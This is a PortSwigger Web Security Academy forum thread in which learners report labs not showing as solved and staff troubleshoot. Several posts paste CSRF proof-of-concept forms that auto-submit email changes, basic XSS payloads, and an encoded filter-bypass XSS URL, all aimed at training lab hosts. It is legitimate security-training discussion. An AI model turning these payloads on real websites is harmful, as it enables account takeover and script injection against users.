Research Academy
My account Customers About Blog Careers Legal Contact Resellers
The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTER DISCORD

solved lab show not solved

abhineet | Last updated: Mar 28, 2022 08:29AM UTC

Hi, I have solved xss to csrf to change email but it does not show solved after solving the lab

Ben, PortSwigger Agent | Last updated: Mar 28, 2022 08:34AM UTC

Hi, Are you able to provide us with some screenshots and details of what steps you have taken to solve the lab so that we can take a look at this for you? You can send us an email at support@portswigger.net and include the details there.

Cipher | Last updated: Sep 09, 2022 06:34PM UTC

Same problem is arising in my case (Stored XSS into HTML context with nothing encoded) in this lab. Please look into it.

Michelle, PortSwigger Agent | Last updated: Sep 12, 2022 08:00AM UTC

Thanks for your message. If you check your account now, that lab should be showing as solved.

Puneet | Last updated: Dec 08, 2022 10:21AM UTC

Same problem arising in my situation also where i solved sql injection labs but it is keep showing not solved .

Michelle, PortSwigger Agent | Last updated: Dec 08, 2022 03:03PM UTC

Thanks for getting in touch. The original issue reported on this thread was resolved. We've just run some checks, and when we solve labs in the SQL injection section, these are being updated and showing as solved on the list of All Labs. If you're still having issues, can you send some screenshots of the labs you are working on and what you're seeing in your PortSwigger account to support@portswigger.net, please?

Max | Last updated: Mar 08, 2023 02:05AM UTC

Hello, I am also getting the same issue for CSRF Lab-1. Solved the task using VSCode hosted to localhost, it was able to change the E-Mail but the Lab shows it is not solved. I also used the code from hint section. It does the same, shows lab not solved. Here is my code, Thanks: <html> <body> <h1>Random Text</h1> <!-- iframe is used and is set to invisible so that the user is not able to view the attack took place. --> <!-- <iframe style="display:none" name="csrf-iframe"></iframe> --> <!-- URL: https://0a3f006304f03264c1578fa100140072.web-security-academy.net/my-account --> <!-- This is the Host field: 0ad70033045b7e08c80be806003b000d.web-security-academy.net --> <!-- This is the Post field: /my-account/change-email --> <!-- "Action" is where the data is sent, "target" is which window (or tab, frame, iframe) to use for the request. --> <form action="https://0a3f006304f03264c1578fa100140072.web-security-academy.net/my-account/change-email" method="POST" id="csrf-form" target="csrf-iframe"> <input type="hidden" name="email" value="rajhlinux_2@yahoo.com"> </form> <script> document.forms[0].submit(); </script> <!-- <form method="POST" action="https://0a3f006304f03264c1578fa100140072.web-security-academy.net/my-account/change-email"> <input type="hidden" name="email" value="a@aaa.com"> </form> <script> document.forms[0].submit(); </script> --> </body> </html>

Max | Last updated: Mar 08, 2023 02:14AM UTC

Alright, I seem to have solved the lab by sending the body to the postswigger's "exploit server page"

Hariharan | Last updated: Aug 13, 2023 08:36AM UTC

<img src='' onerror='alert(Hi)'>

Vansh | Last updated: Aug 26, 2024 07:03AM UTC

Hello, I am also getting the lab not solved even after successfully completing the task on DOM XSS in document.write sink using source location.search Lab. I used the payload- Dom" onload="alert(1)

Ben, PortSwigger Agent | Last updated: Aug 26, 2024 07:10AM UTC

Hi Vansh, Have you tried using the payload in the written solution for this particular lab?

Vansh | Last updated: Aug 26, 2024 09:12AM UTC

Yes i have tried that too

Ben, PortSwigger Agent | Last updated: Aug 26, 2024 10:40AM UTC

Hi Vansh, I ran through that particular lab earlier today and was able to solve it using the solution provided - are you able to provide us with some screenshots to show exatly what payload you are using? In addition, what browser are you using when you attempt this lab?

Mohammed | Last updated: Aug 29, 2024 10:16AM UTC

I am also facing the same problem for xss lab.For example in Reflected XSS into HTML context with nothing encoded in this lab I used the script <script>alert(1)</script) it is showing pop up.After the again I rewrite this script in URL and still showing pop up.But lab not solved status is not changing.

Michelle, PortSwigger Agent | Last updated: Aug 30, 2024 08:24AM UTC

I've just checked this lab and if I enter <script>alert(1)</script> in the 'Search the blog...' box I see the pop-up and the lab shows as solved. Could you give this another try and let us know if you're still seeing issues?

Mohammed | Last updated: Sep 01, 2024 11:09AM UTC

CSRF where token validation depends on request method. I solved this lab as per the innstruction and the mail got changed.But it is not showing the congratulations.Later on I even followed the tutorial and followed the same procedure still it's not showing the congratulations pop up.Faced the same problem for Lab: CSRF where token validation depends on token being present.

Michelle, PortSwigger Agent | Last updated: Sep 02, 2024 08:12AM UTC

Hi I wasn't seeing the same issue when I tested the lab. Could you please email support@portswigger.net with some screenshots or a screen recording of the steps you're taking so I can try and spot what I have done differently?

Arshia | Last updated: Sep 13, 2024 09:02PM UTC

Hi I have the same problem with the "Stored XSS into HTML context with nothing encoded" lab. I tried: <script>alert(1)</script> <script> alert(1) </script> <script>alert()</script> <script>alert("Hi")</script>

Ben, PortSwigger Agent | Last updated: Sep 17, 2024 07:33AM UTC

Hi Arshia, Using <script>alert(1)</script> (as suggested in the written solution) allows me to solve this particular lab. Are you still having issues with this lab as of right now?

myouboku | Last updated: Oct 01, 2024 09:38AM UTC

Hello, I am also getting the same issue for CSRF Lab-1. it was able to change the E-Mail but the Lab shows it is not solved Code: <html> <body> <form method="POST" action="https://YOUR-LAB-ID.web-security-academy.net/my-account/change-email"> <input type="hidden" name="$param1name" value="$param1value"> </form> <script> document.forms[0].submit(); </script> </body> </html>

Ben, PortSwigger Agent | Last updated: Oct 02, 2024 08:42AM UTC

Hi, I have just run through this lab and been able to solve it using the following exploit: <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <form action="https://0a40000203d7ce5080a5df1a00ee0030.web-security-academy.net/my-account/change-email" method="POST"> <input type="hidden" name="email" value="test3&#64;hotmail&#46;com" /> <input type="submit" value="Submit request" /> </form> <script> history.pushState('', '', '/'); document.forms[0].submit(); </script> </body> </html> Are you still having issues with the lab as of right now?

Mohammed | Last updated: Oct 02, 2024 12:08PM UTC

Same problem with me, solved the lab, but not showing on the lab

xeantaur | Last updated: Oct 02, 2024 12:08PM UTC

Hello, I am experiencing the same problem in CSRF 2nd lab. This is the exploit I wrote: <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <form action="https://0a88006a03e63d0280b8671300250041.web-security-academy.net/my-account/change-email"> <input type="hidden" name="email" value="testt&#64;gmail&#46;com" /> <input type="hidden" name="csrf" value="12345" /> <input type="submit" value="Submit request" /> </form> <script> history.pushState('', '', '/'); document.forms[0].submit(); </script> </body> </html>

Ben, PortSwigger Agent | Last updated: Oct 03, 2024 10:13AM UTC

Hi, If you check the Access log are you seeing that the victim is visiting the page when you deliver the exploit (there should be a different IP address listed in the log)?

Gahfy | Last updated: Oct 17, 2024 03:57PM UTC

Hello, I'm facing the same issue for both "Stored XSS into HTML context with nothing encoded" and "Reflected XSS into HTML context with nothing encoded". I both tried some custom alerts (<script>alert('Hello World!');</script>) then read the solution as it seemed to be solved for me. Then I tried with <script>alert(1)</script> (using 1 and no semicolon) but this still seems to be unsolved for both.

Ben, PortSwigger Agent | Last updated: Oct 17, 2024 04:36PM UTC

Hi Gahfy, I have just tried both of these labs and was able to solve both using the solutions provided whilst using a Firefox browser. For completeness, for the "Stored XSS into HTML context with nothing encoded" lab I entered the payload <script>alert(1)</script> in the 'Comment' box when submitting a post. For the "Reflected XSS into HTML context with nothing encoded" lab, I entered the payload <script>alert(1)</script> into the search box.

Gahfy | Last updated: Oct 17, 2024 05:02PM UTC

For both of them, it didn't solve the challenge (using Firefox on macOS). Also, a link to the following will solve the challenge "Reflected XSS into HTML context with most tags and attributes blocked", by opening a print box, but the problem will not consider itself as solved. https://[currentEnvironmentId].web-security-academy.net/?search=<xss+onscrollend%3D"print()%3B"+style%3D"display%3Ablock%3Bheight%3A100px%3Bwidth%3A200px%3Boverflow%3Aauto">HelloToi+aussi+parfois+tu+ne+sens+pas+la+foudre+venir+parfois+et+si+seulement<h2+id%3Dx>Bonjour<%2Fh2><%2Fxss>#x I have also tried all those with Chrome, so may it be due to macOS? Any known issue with it?

Ben, PortSwigger Agent | Last updated: Oct 18, 2024 04:37AM UTC